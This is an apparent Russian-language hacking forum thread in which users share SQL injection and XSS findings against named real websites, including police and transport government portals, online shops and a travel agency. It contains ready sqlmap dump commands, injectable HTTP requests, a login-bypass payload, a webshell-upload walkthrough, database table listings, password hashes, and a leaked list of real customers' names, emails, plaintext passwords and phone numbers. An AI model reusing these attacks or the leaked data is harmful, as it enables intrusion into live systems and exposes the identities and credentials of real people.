Найденные интересеные SQL inj & XSS

GridsNetwork · 26.04.2023

shrinbaba · 26.04.2023

XSS vulnerability in registration form for new users at https://dist.r1soft.com/s/

POC: selectOption("contactCountry", "" + alert("hello XSS!") + "");

handleContactState("xss.pro");

GridsNetwork · 28.04.2023

sqlmap -u " http://electrouno.es:80/ajax/front....try=-1' OR 3*2*1=6 AND 000893=000893 -- &l=es "

breakarule · 18.05.2023

Khyber Pakhtunkhwa Police - Official Portal

To protect lives, properties and honour of the people; maintain public order and enforce the laws of the land to the best of our ability and without any discrimination, through modern, proactive policing and community participation.

kppolice.gov.pk

1

ayyab

ayyab:624ddb5153f62bcf238e384921a1494f:1,2:Umar Hayat:umar_y:8f1628e9c66e22d58454d1ef72365a85:2,3:Muhammad Altaf:altaf:1203ec2a6ed36b4f97d49458c8beefb3:1,4:zulfiqar:zulfiqar:65d87f9763a1cb743c7b7d84046e1e4c:3,5

as:das:cbb2c6ec1a3aeb5e63f3811699d1ee15:1

beybala · 18.05.2023

Код:

GET /ar/product/-116.html HTTP/2
Host: www.unat.com.tr
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Affected URL: https://www.unat.com.tr/ar/product/-116.html

GridsNetwork · 03.06.2023

GET /api/v1/get_stickers?category_id=1/(3*2-5)&version=1.1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referrer: https://www.wedmegood.com/
Cookie: PHPSESSID=1indhnk9pe68h7kmbfkvs9fhqh; option=A; desktopVariant=A; WZRK_G=ffc93d436bd5433db2a0a56a29b7ffd1; WZRK_S_67K-K7K-884Z=%7B%22p%22%3A1%2C%22s%22%3A1685783708%2C%22t%22%3A1685783709%7D; _fbp=fb.1.1685781646100.1050989934
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: www.wedmegood.com
Connection: Keep alive

factor · 26.06.2023

PersonalDrones

Rivenditore autorizzato e assistenza droni DJI, Yuneec, Parrot e altri marchi

www.personaldrones.it

POST /carrello HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.personaldrones.it/
Content-Length: 89
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:114.0) Gecko/20100101 Firefox/114.0
Host: www.personaldrones.it
Connection: Keep-alive

id_product=1&token=855a3bc697bd54ea9c0a0bde11841de6

| ps_guest | 3683944 |
| ps_connections | 2603235 |
| ps_connections_source | 742152 |
| ps_cart_rule_combination | 550124 |
| ps_pagenotfound | 321154 |
| ps_migrationpro_migrated_data | 313149 |
| ps_search_index | 240487 |
| ps_statssearch | 193508 |
| ps_log | 128196 |
| ps_order_history | 117953 |
| ps_eventbus_incremental_sync | 114139 |
| ps_aff_hits | 113795 |
| ps_mail | 92205 |
| ps_cart | 84961 |
| ps_cart_product | 74677 |
| ps_payplug_logger | 68981 |
| ps_cart_rule_product_rule_value | 65074 |
| ps_stripe_official_processlogger | 64093 |
| ps_totloyalty_history | 61858 |
| ps_document_references | 52380 |
| ps_order_detail | 49226 |
| ps_order_detail_tax | 48885 |
| ps_migrationpro_pass | 31715 |
| ps_stock_mvt | 30880 |
| ps_orders | 29210 |
| ps_totloyalty | 29094 |
| ps_rc_pganalytics_orders_sent | 29001 |
| ps_order_payment | 27788 |
| ps_order_carrier | 27655 |
| ps_order_invoice_payment | 26815 |
| ps_order_invoice | 26337 |
| ps_einvoice_address | 26295 |
| ps_address | 26142 |
| ps_search_word | 25632 |
| ps_order_invoice_tax | 25525 |
| ps_message | 22935 |
| ps_customer_session | 22076 |
| ps_customer_group | 19657 |
| ps_customer | 19150 |
| ps_condition_advice | 18343 |
| ps_tab_advice | 18343 |
| ps_wk_affiliate_hits | 17723 |
| ps_ets_abancart_display_log | 17121 |
| ps_customer_message | 15917 |
| ps_elegantaltinypngimagecompress_images | 14668 |
| ps_image | 13422 |
| ps_image_lang | 13422 |
| ps_image_shop | 13422 |
| ps_layered_price_index | 11782 |
| ps_customer_thread | 11731 |
| ps_paypal_processlogger | 10810 |
| ps_rc_pganalytics_client_id | 8312 |
| ps_category_product | 8279 |
| ps_psgdpr_log | 7208 |
| ps_order_cart_rule | 6409 |
| ps_stock_available | 5878 |
| ps_paypal_order | 5291 |
| ps_paypal_capture | 5233 |
| ps_product_attribute_combination | 5101 |
| ps_ets_abancart_mail_log | 4491 |
| ps_ets_abancart_tracking | 4439 |
| ps_totloyaltyadvanced | 4192 |
| ps_totloyaltyadvanced_shop | 4192 |
| ps_product | 4189 |
| ps_product_lang | 4189 |
| ps_product_shop | 4189 |
| ps_page | 3682 |
| ps_ets_crosssell_product_viewed | 3295 |
| ps_cart_cart_rule | 3293 |
| ps_helpdesk_replies | 3281 |
| ps_configuration | 2850 |
| ps_tag_count | 2424 |
| ps_access | 2348 |
| ps_specific_price | 2312 |
| ps_specific_price_priority | 2154 |
| ps_g_upsellanytic | 1982 |
| ps_authorization_role | 1724 |
| ps_product_attribute | 1661 |
| ps_product_attribute_shop | 1661 |
| ps_product_sale | 1640 |
| ps_einvoice | 1638 |
| ps_stripe_event | 1634 |
| ps_cart_rule | 1536 |
| ps_cart_rule_lang | 1536 |
| ps_module_group | 1430 |
| ps_ets_ctf_log | 1361 |
| ps_product_tag | 1319 |
| ps_stripe_payment_intent | 1278 |
| ps_category_group | 1206 |
| ps_ets_ctf_contact_message | 1169 |
| ps_ets_ctf_contact_message_shop | 1169 |
| ps_soisy_order | 1164 |
| ps_payplug_payment | 1129 |
| ps_stripe_idempotency_key | 1075 |
| ps_cart_rule_product_rule | 1006 |
| ps_itcfefields | 1000 |
| ps_itcfefields_shop | 1000 |
| ps_stripe_payment | 980 |
| ps_hook_module | 962 |
| ps_payplug_order_payment | 953 |
| ps_hook | 918 |
| ps_stripe_capture | 860 |
| ps_g_upsellcart | 776 |
| ps_pscheckout_cart | 764 |
| ps_carrier_group | 732 |
| ps_cart_rule_product_rule_group | 711 |
| ps_employee_session | 678 |
| ps_layered_product_attribute | 675 |
| ps_helpdesk | 664 |
| ps_layered_category | 652 |
| ps_tax_rule | 645 |
| ps_codfee_orders | 639 |
| ps_scalapay_admin | 637 |
| ps_product_attribute_image | 592 |
| po_access | 588 |
| ps_eventbus_job | 579 |
| ps_timezone | 560 |
| ps_ce_meta | 547 |
| ps_module_country | 528 |
| ps_module_access | 527 |
| ps_translation | 465 |
| ps_smallpay_product | 457 |
| ps_pscheckout_order_matrice | 454 |
| ps_advice | 446 |
| ps_advice_lang | 446 |
| ps_aff_referrals | 429 |
| ps_pbp_cart_productextra | 401 |
| ps_aff_relation | 358 |
| ps_delivery | 336 |
| ps_state | 324 |
| ps_webservice_permission | 311 |
| ps_attribute | 309 |
| ps_attribute_lang | 309 |
| ps_attribute_shop | 309 |
| ps_tab | 304 |
| ps_tab_lang | 301 |
| ps_nxtal_variant_product | 294 |
| ps_emailsubscription | 292 |
| ps_ets_abancart_display_tracking | 283 |
| ps_elegantaltinypngimagecompress | 281 |
| ps_wk_affiliate_referral | 255 |
| ps_accessory | 247 |
| ps_address_format | 245 |
| ps_country | 245 |
| ps_country_lang | 245 |
| ps_country_shop | 245 |
| ps_condition | 244 |
| ps_condition_badge | 236 |
| ps_badge | 234 |
| ps_badge_lang | 234 |
| ps_tag | 221 |
| ps_layered_filter_shop | 215 |
| ps_migrationpro_warning_logs | 208 |
| ps_module_carrier | 202 |
| ps_module_history | 202 |
| ps_category | 189 |
| ps_category_lang | 189 |
| ps_category_shop | 189 |
| ps_range_price | 185 |
| ps_configuration_lang | 178 |
| ps_fb_category_match | 172 |
| ps_wk_affiliate_commission_history | 170 |
| ps_customized_data | 168 |
| ps_stripe_customer | 157 |
| ps_carrier_zone | 153 |
| ps_ce_revision | 144 |
| ps_accessory_cart_product | 142 |
| ps_module | 131 |
| ps_mailalert_customer_oos | 128 |
| ps_admin_filter | 118 |
| ps_wk_affiliate | 116 |
| ps_wk_affiliate_voucher_details | 116 |
| ps_module_shop | 107 |
| ps_aff_affiliates | 106 |
| ps_pack | 99 |
| ps_blockwishlist_statistics | 97 |
| ps_carrier | 97 |
| ps_carrier_lang | 97 |
| ps_carrier_shop | 97 |
| ps_carrier_tax_rules_group_shop | 97 |
| ps_wishlist_product | 97 |
| ps_hook_alias | 88 |
| ps_payplug_card | 78 |
| ps_g_upsellproductcombin | 75 |
| ps_configuration_kpi | 72 |
| ps_page_type | 69 |
| ps_manufacturer | 64 |
| ps_manufacturer_lang | 64 |
| ps_manufacturer_shop | 64 |
| ps_order_state | 61 |
| ps_order_state_lang | 61 |
| ps_migrationpro_save_mapping | 60 |
| ps_attribute_group | 58 |
| ps_attribute_group_lang | 58 |
| ps_attribute_group_shop | 58 |
| ps_meta | 51 |
| ps_meta_lang | 51 |
| ps_layered_indexable_attribute_group | 50 |
| ps_accessory_group_product | 48 |
| ps_accessory_group_product_lang | 48 |
| ps_aff_configuration | 44 |
| ps_prestablog_correspondancecategorie | 43 |
| ps_prestablog_news | 43 |
| ps_prestablog_news_lang | 43 |
| ps_prestablog_news_product | 40 |
| ps_advancedpopup | 39 |
| ps_advancedpopup_lang | 39 |
| ps_migrationpro_configuration | 39 |
| ps_pbp_product | 38 |
| ps_search_engine | 38 |
| ps_laber_staticblock | 37 |
| ps_laber_staticblock_lang | 37 |
| ps_laber_staticblock_shop | 37 |
| ps_wishlist | 36 |
| ps_pbp_bundle | 35 |
| ps_pbp_bundle_lang | 35 |
| ps_order_message | 30 |
| ps_order_message_lang | 30 |
| ps_wk_affiliate_commission | 30 |
| ps_labslideshow | 28 |
| ps_labslideshow_slides | 28 |
| ps_labslideshow_slides_lang | 28 |
| ps_smallpay_xpay_payments | 27 |
| ps_payplug_order_state | 25 |
| ps_giftcardorder | 23 |
| ps_quick_access | 22 |
| ps_quick_access_lang | 22 |
| ps_ets_abancart_campaign_group | 21 |
| ps_prestablog_categorie_group | 21 |
| ps_smallpay_installments | 21 |
| ps_cms | 20 |
| ps_cms_lang | 20 |
| ps_cms_shop | 20 |
| ps_totloyalty_state_lang | 20 |
| ps_g_upsellrule | 19 |
| ps_g_upsellrule_lang | 19 |
| ps_g_upsellrule_shop | 19 |
| ps_ets_abancart_email_template | 16 |
| ps_ets_abancart_email_template_lang | 16 |
| ps_module_currency | 16 |
| ps_labcategory | 15 |
| ps_labcategory_lang | 15 |
| ps_labcategory_shop | 15 |
| ps_order_return_detail | 15 |
| ps_employee | 14 |
| ps_employee_shop | 14 |
| ps_tax_rules_group | 14 |
| ps_tax_rules_group_shop | 14 |
| ps_stock_mvt_reason | 12 |
| ps_stock_mvt_reason_lang | 12 |
| ps_alias | 11 |
| ps_group | 11 |
| ps_group_lang | 11 |
| ps_group_shop | 11 |
| ps_web_browser | 11 |
| ps_feature_value | 10 |
| ps_feature_value_lang | 10 |
| ps_helpdesk_prereplies | 9 |
| ps_helpdesk_prereplies_lang | 9 |
| ps_labmegamenu | 9 |
| ps_labmegamenu_lang | 9 |
| ps_labmegamenu_shop | 9 |
| ps_operating_system | 9 |
| ps_configuration_kpi_lang | 8 |
| ps_eventbus_type_sync | 8 |
| ps_image_type | 8 |
| ps_order_return | 8 |
| ps_webservice_account | 8 |
| ps_webservice_account_shop | 8 |
| ps_zone | 8 |
| ps_zone_shop | 8 |
| ps_product_supplier | 7 |
| ps_tax | 7 |
| ps_tax_lang | 7 |
| ps_feature | 6 |
| ps_feature_lang | 6 |
| ps_feature_shop | 6 |
| ps_order_slip_detail | 6 |
| ps_request_sql | 6 |
| ps_supply_order_state | 6 |
| ps_supply_order_state_lang | 6 |
| ps_aff_rates | 5 |
| ps_einvoice_numbers | 5 |
| ps_labgroupcategory | 5 |
| ps_labgroupcategory_shop | 5 |
| ps_labmegamenu_item | 5 |
| ps_labmegamenu_item_lang | 5 |
| ps_labmegamenu_item_shop | 5 |
| ps_order_return_state | 5 |
| ps_order_return_state_lang | 5 |
| ps_order_slip | 5 |
| ps_profile | 5 |
| ps_profile_lang | 5 |
| ps_totloyalty_state | 5 |
| ps_ws_loyalty_state | 5 |
| ps_ws_loyalty_state_lang | 5 |
| ps_accessory_product_setting | 4 |
| ps_employee_filter | 4 |
| ps_fmm_stickers_lang | 4 |
| ps_fmm_stickers_rules_shop | 4 |
| ps_fmm_stickers_shop | 4 |
| ps_payplug_lock | 4 |
| ps_psgdpr_consent | 4 |
| ps_psgdpr_consent_lang | 4 |
| ps_risk | 4 |
| ps_risk_lang | 4 |
| ps_aff_cart_rule | 3 |
| ps_aff_configuration_lang | 3 |
| ps_ets_abancart_campaign | 3 |
| ps_ets_abancart_campaign_lang | 3 |
| ps_ets_abancart_field | 3 |
| ps_ets_abancart_field_lang | 3 |
| ps_ets_abancart_reminder | 3 |
| ps_fmm_stickers | 3 |
| ps_fmm_stickers_rules | 3 |
| ps_homeslider | 3 |
| ps_homeslider_slides | 3 |
| ps_homeslider_slides_lang | 3 |
| ps_lpsproaccount_VATNumber | 3 |
| ps_nxtal_variant_group | 3 |
| ps_nxtal_variant_group_lang | 3 |
| ps_psreassurance | 3 |
| ps_psreassurance_lang | 3 |
| ps_reassurance | 3 |
| ps_reassurance_lang | 3 |
| ps_ce_content | 2 |
| ps_ce_content_lang | 2 |
| ps_ce_content_shop | 2 |
| ps_cms_category | 2 |
| ps_cms_category_lang | 2 |
| ps_cms_category_shop | 2 |
| ps_ets_ctf_contact | 2 |
| ps_ets_ctf_contact_lang | 2 |
| ps_ets_ctf_contact_shop | 2 |
| ps_gender | 2 |
| ps_gender_lang | 2 |
| ps_giftcardtag | 2 |
| ps_giftcardtemplate_tag | 2 |
| ps_helpdesk_status | 2 |
| ps_helpdesk_status_lang | 2 |
| ps_labmegamenu_column | 2 |
| ps_labmegamenu_column_shop | 2 |
| ps_labmegamenu_row | 2 |
| ps_labmegamenu_row_shop | 2 |
| ps_labproductfilter | 2 |
| ps_labproductfilter_shop | 2 |
| ps_layered_indexable_feature | 2 |
| ps_link_block | 2 |
| ps_link_block_lang | 2 |
| ps_link_block_shop | 2 |
| ps_prestablog_categorie | 2 |
| ps_prestablog_categorie_lang | 2 |
| ps_prestablog_commentnews | 2 |
| ps_range_weight | 2 |
| ps_supplier | 2 |
| ps_supplier_lang | 2 |
| ps_supplier_shop | 2 |
| ps_wk_affiliate_payment_detail | 2 |
| ps_accessory_group | 1 |
| ps_accessory_group_lang | 1 |
| ps_codfee_configuration | 1 |
| ps_codfee_configuration_lang | 1 |
| ps_contact | 1 |
| ps_contact_lang | 1 |
| ps_contact_shop | 1 |
| ps_currency | 1 |
| ps_currency_lang | 1 |
| ps_currency_shop | 1 |
| ps_custom_payment_method | 1 |
| ps_custom_payment_method_lang | 1 |
| ps_custom_payment_method_shop | 1 |
| ps_ets_abancart_form | 1 |
| ps_ets_abancart_form_lang | 1 |
| ps_ets_abancart_unsubscribers | 1 |
| ps_feature_flag | 1 |
| ps_giftcardproduct | 1 |
| ps_giftcardtemplate | 1 |
| ps_giftcardtemplate_lang | 1 |
| ps_gsitemap_sitemap | 1 |
| ps_helpdesk_departments | 1 |
| ps_helpdesk_departments_lang | 1 |
| ps_hook_module_exceptions | 1 |
| ps_info | 1 |
| ps_info_lang | 1 |
| ps_info_shop | 1 |
| ps_labvegamenu | 1 |
| ps_labvegamenu_lang | 1 |
| ps_labvegamenu_shop | 1 |
| ps_lang | 1 |
| ps_lang_shop | 1 |
| ps_layered_filter | 1 |
| ps_pbp_product_option | 1 |
| ps_pbp_tabs_lang | 1 |
| ps_prestablog_author | 1 |
| ps_prestablog_color | 1 |
| ps_prestablog_slide | 1 |
| ps_prestablog_slide_lang | 1 |
| ps_prestablog_subblock | 1 |
| ps_prestablog_subblock_lang | 1 |
| ps_product_carrier | 1 |
| ps_product_comment | 1 |
| ps_product_comment_criterion | 1 |
| ps_product_comment_criterion_lang | 1 |
| ps_product_comment_grade | 1 |
| ps_product_download | 1 |
| ps_required_field | 1 |
| ps_shop | 1 |
| ps_shop_group | 1 |
| ps_shop_url | 1 |
| ps_specific_price_rule | 1 |
| ps_store | 1 |
| ps_store_lang | 1 |
| ps_store_shop | 1 |
| ps_whatsappchatblock | 1 |
| ps_whatsappchatblock_lang | 1 |

Minerva Official e-shop

www.minerva.gr

| orders_lines | 516378 |
| orders | 148460 |
| order_sync_status | 142835 |
| users | 125037 |
| furl | 123420 |
| users_history_login | 112420 |
| store_availability | 108013 |
| newsletter | 64257 |
| product_multi_categ | 19223 |
| favorite | 18313 |
| material_extraset | 15730 |
| material_category | 15107 |
| users_basket_line | 12648 |
| material | 11634 |
| coupon | 6550 |
| system_mail_log | 5468 |
| material_detail | 2177 |
| suggestion | 1969 |
| contact_side | 1107 |
| system_text_fld | 478 |
| size_position | 369 |
| geo_group_country | 241 |
| country | 239 |
| material_spec | 212 |
| itemgroup3 | 189 |
| city_to_ps | 70 |
| product_multi_box | 68 |
| synthesi | 66 |
| geo_group_nomos | 61 |
| config | 57 |
| city | 52 |
| bundle | 51 |
| series | 49 |
| branch | 36 |
| C01V_ESHOP_PRODUCT_QTY_LINES | 36 |
| size_bra | 35 |
| C01V_ESHOP_SIZES | 30 |
| pay_to_send | 30 |
| system_admin_param | 27 |
| send_types | 23 |
| vatcategory | 23 |
| spec_group | 19 |
| system_admin_config | 19 |
| coupon_extra | 18 |
| C01V_ESHOP_PRODUCT_QTY_HEADER | 17 |
| content_page | 16 |
| C01V_ESHOP_COLLECTIONS | 15 |
| bundle_tmp | 14 |
| gallery_config | 12 |
| shipment | 11 |
| vitrine_mobile | 11 |
| size_scale | 9 |
| static_text | 9 |
| vatstatus | 9 |
| gallery_content | 8 |
| system_users | 8 |
| bran_group | 7 |
| faq | 7 |
| email_form_fields | 6 |
| payment | 6 |
| bundle_categ | 5 |
| geo_group_list | 5 |
| availability | 4 |
| orderstatus | 4 |
| sess_basket | 4 |
| content_categ | 3 |
| units | 3 |
| epibebaiomenes | 2 |
| carousel | 1 |
| contact | 1 |
| email_form | 1 |
| instagram | 1 |
| news | 1 |

factor · 30.06.2023

Index | HashCoinMining

HashCoinMining

hashcoinmining.com

POST /Account/ConsultarUser.php?mode=Login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://hashcoinmining.com/
Cookie: PHPSESSID=005ogva0habb6n2o7pg7auqpg0
Content-Length: 78
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: hashcoinmining.com
Connection: Keep-alive

Email=0&Password=u]H[ww6KrA9F.x-F

Database: u426398576_hash_1
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| Users_Accounts | 297285 |
| UserStats | 297165 |
| Affiliates | 296845 |
| Invoices | 18867 |
| DepositsPending | 16524 |
| VerifyWithdrawal | 9458 |
| WithdrawalsCompletes | 3170 |
| SupportMessage | 2085 |
| WalletPay_BTC | 2000 |
| WalletPay_ETH | 2000 |
| WalletPay_LTC | 1999 |
| WalletPay_DOGE | 1000 |
| DepositsComplete | 100 |
| NombresFalsos | 29 |
| PlanesInversion | 11 |
| StatsDogeminer | 5 |

prono · 11.07.2023

sqlmap -u https://intranet.marcotranlogistics.com/accesolocal.asp?lang=en --forms --dump -D qc023 --threads=5 --random-agent --hex

Prokhorenco · 13.07.2023

site: https://optiontravel.com.eg
Vuln: SQLi

python3 sqlmap.py -u https://www.optiontravel.com.eg/carrentaldetails.php?trip=11 --random-agent --dump-all -D option_travel_website --tables --threads=10

Sample data:

Код:

nader,1,nkhalil@istecheg.com,12345
Rania Ahmed,1,r.ahmed@optiontravel.com.eg,R@nia_278
Hadir Ahmed,1,domestic@optiontravel.com.eg,H@dir_278
Ahmed Ali,1,outgoing.manager@optiontravel.com.eg,@ptionT_278
Sarah Saleh,1,incoming1@optiontravel.com.eg,@Travel_278
Heba William,1,incoming@optiontravel.com.eg,Heb@_OT2023
Hanan Reda,1,h.reda@optiontravel.com.eg ,hRed@2023
bahaa.gabal@yahoo.com,0,NULL,12345,0237866822
naderm.khalil@gmail.com,0,NULL,FR2wrAre,0237866822
hello@moushira.com,0,Moushira,gEjmej-wefnot-9cifru,01224415788
ohlotf@gmail.com,0,Omar Lotfy,Omar 573570,01006469499
naderm.khalil2@gmail.com,0,admin,12345,010
nkhalil@istecheg.com,0,Nader,12345,01111520008
nada.hassab@artdegypte.com,0,Nada Hassab,Nadaahassab,01200001958
alexandaromar49@gmail.com,0,Ahmed,01271580069Ah,01224615446
m.abounour@gmail.com,0,Mohammed abou nour,01223324323,01223324323
hamadaelabd79@gmail.com,0,Mohamed El abd ,shams_shams@12,+201225769171
nadaabdelrazek.ek@gmail.com,0,Nada,Tvdagbjb13,01227296152
osamaemam121086@gmail.com,0,Osamaemam,121086,01270879332
jojoelmowafy@gmail.com,0,jana,jana47jana,01224968991
yasmin.marwan1@gmail.com,0,Yasmin,lemona12345,01229082922
saidasd325@gmail.com,0,Said othman,0987Poiuy,012-240-748-68
mohammedabdelfatah35@gmail.com,0,Mohamed Abd El Fatah ,017811477894,01110748961
aline.youssef87@gmail.com,0,Aline,Newpass2020,01223999181
komark510@gmail.com,0,Khadija,khadigaomar510,01061465796
Ahmed_hisham99@hotmail.com,0,Ahmed Hisham ,munchy90,01152257777
rana.roshdy1993@gmail.com,0,Rana,rona1993,01288396321
a.mohamed@bioenergyegy.com,0,Abdullah,Doby@5619,01278078056
larasedhom@gmail.com,0,Lara Sedhom,LAR123laly,01284726435
selwishahy@gmail.com,0,Sherif Elwishahy ,24112001es,01223564527
raw_mahfouz@outlook.com,0,Rawan,fojDob-woqsyt-rutzy7,01273390315
rm@inkdesignhub.com,0,Rawan,janggeunsukss501,01273390315
habibabyazid@icloud.com,0,Habiba byazid,Byazid2327,01207666370
hafez.melies@linear-technology.com,0,Hafez,Zazato1963,01282759482
mohamed.eshiba@hotmail.com,0,mohamed samy,mA011419,01141933453
mhoameda766@gmail.com,0,mohameda ahmed ,Mh123456789*#,0128 423 0290
mtlmohamed9@gmail.com,0,mohamed bd elmotaal,Mm123456!,01279923107
omarelamer@gmail.com,0,Omar,Acmilan123,00201287774551
ahlamlolo1313@gmail.com,0,ahlam abdulsalam,ahlamlolaa,01552851944
halaragab2013@gmail.com,0,Hala Ragab,HAzr@1990,01222233110

zloymen · 16.07.2023

re_edit

Prokhorenco · 23.07.2023

For the noobs:

Shelling a site via SQLi

Identify admin panel of site (https://github.com/mIcHyAmRaNe/okadminfinder3):

Код:

user@host:~/okadminfinder3$ ./okadminfinder.py -u https://optiontravel.com.eg/ -r
 
         _______ _     _           _       _         ___ _           _
        ( ______( )   | |         | |     (_)       / __(_)         | |
        | |     | |___| |_____  __| |____  _ ____ _| |__ _ ____   __| |_____  ____
        | |   | |  _   _(____ |/ _  |    \| |  _ (_   __| |  _ \ / _  | ___ |/ ___)
        | |___| | |  \ \/ ___ ( (_| | | | | | | | || |  | | | | ( (_| | ____| |
         \_____/|_|   \_\_____|\____|_|_|_|_|_| |_||_|  |_|_| |_|\____|_____|_|
            💚 version 1.0.0 created by O.Koleda & recoded by mIcHyAmRaNe 💚

          
  https://optiontravel.com.eg/   is stable
 
 ҂ Found:  https://optiontravel.com.eg/siteadmin/index.php                                                           

 ҂ Found:  https://optiontravel.com.eg/siteadmin                                                                     

 ҂ Found:  https://optiontravel.com.eg/siteadmin/

SQLi admin panel bypass (https://github.com/payloadbox/sql-injection-payload-list):

We're in:

Upload webshell via Admin panel (https://github.com/mIcHyAmRaNe/wso-webshell):

Right click > Open image in new tab

Shell

You can find these vulnerable sites using google dorks or vuln scanning.

prono · 25.07.2023

sqlmap -u https://refreshercourse.org/RefresherEntryReport.asp?sno=13314 --cookie=" add you cookie, login form bypass via ' or ''=' "

prono · 26.07.2023

sqlmap -u "https://www.jewishusedbooks.com/admin.asp?cmd=vieworder&id=4624*" " add you cookie, login form bypass via ' or ''=' "

esther:5807930
jub:gvodzitz1577

prono · 27.07.2023

sqlmap -u "https://www.eyeofdubai.ae/directory...y=value*&count=value&sort-by=value&sort=value"

Parameter: category (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Prokhorenco · 07.08.2023

user@host:~$ python3 sqlmap-dev/sqlmap.py -u "https://irad.parivahan.gov.in/api/api_live35/reports/accident_line/getdistrict.php?statecode=01" --dbs --random-agent

HHlol · 14.08.2023

python3 sqlmap-dev/sqlmap.py -u "https://irad.parivahan.gov.in/api/api_live35/reports/accident_line/getdistrict.php?statecode=01" --dbs --random-agent

https://xss.pro/content://com.android.externalstorage.documents/tree/primary%3AAndroid%2Fdata/document/x https://xss.pro/content://com.android.externalstorage.documents/tree/primary%3AAndroid%2Fdata/document/x

prono · 14.08.2023

HHlol сказал(а):

python3 sqlmap-dev/sqlmap.py -u "https://irad.parivahan.gov.in/api/api_live35/reports/accident_line/getdistrict.php?statecode=01" --dbs --random-agent
https://xss.pro/content://com.android.externalstorage.documents/tree/primary%3AAndroid%2Fdata/document/x https://xss.pro/content://com.android.externalstorage.documents/tree/primary%3AAndroid%2Fdata/document/x

404

CyberMAXShaman · 23.08.2023

Oracle FAQ

orafaq.com

sqlmap -u http://orafaq.com/forum/feed.php?basic=1&mode=m&th=167023 --batch -o --answer=redirect=N --sql-shell

---
Parameter: basic (GET)
Type: boolean-based blind
Title: Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: basic=-8171) OR (SELECT (CASE WHEN (6878=6878) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,6878) END) FROM DUAL) IS NULL-- gotY&mode=m&th=167023
---
web server operating system: Linux
web application technology: Nginx, Plesk, PHP 7.3.33
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---

Zodiac · 23.08.2023

URL: rplegalindia.com

SQL Map: python3 sqlmap-dev/sqlmap.py --tor --check-tor --dbs -u https://rplegalindia.com/news-detail.php?id=2 --dump-all

available databases [2]:
[*] information_schema
[*] rplegali_rpleagalindia

Contains useless data shit company

Найденные интересеные SQL inj & XSS

ripper

Вложения

(L3) cache

ripper

Вложения

floppy-диск

RAID-массив

Affected URL: https://www.unat.com.tr/ar/product/-116.html​

ripper

Вложения

CD-диск

CD-диск

ripper

(L3) cache

CD-диск

(L3) cache

ripper

ripper

ripper

(L3) cache

floppy-диск

python3 sqlmap-dev/sqlmap.py -u "https://irad.parivahan.gov.in/api/api_live35/reports/accident_line/getdistrict.php?statecode=01" --dbs --random-agent​

ripper

python3 sqlmap-dev/sqlmap.py -u "https://irad.parivahan.gov.in/api/api_live35/reports/accident_line/getdistrict.php?statecode=01" --dbs --random-agent​

floppy-диск

Oracle FAQ​

RAM

Affected URL: https://www.unat.com.tr/ar/product/-116.html

python3 sqlmap-dev/sqlmap.py -u "https://irad.parivahan.gov.in/api/api_live35/reports/accident_line/getdistrict.php?statecode=01" --dbs --random-agent

python3 sqlmap-dev/sqlmap.py -u "https://irad.parivahan.gov.in/api/api_live35/reports/accident_line/getdistrict.php?statecode=01" --dbs --random-agent

Oracle FAQ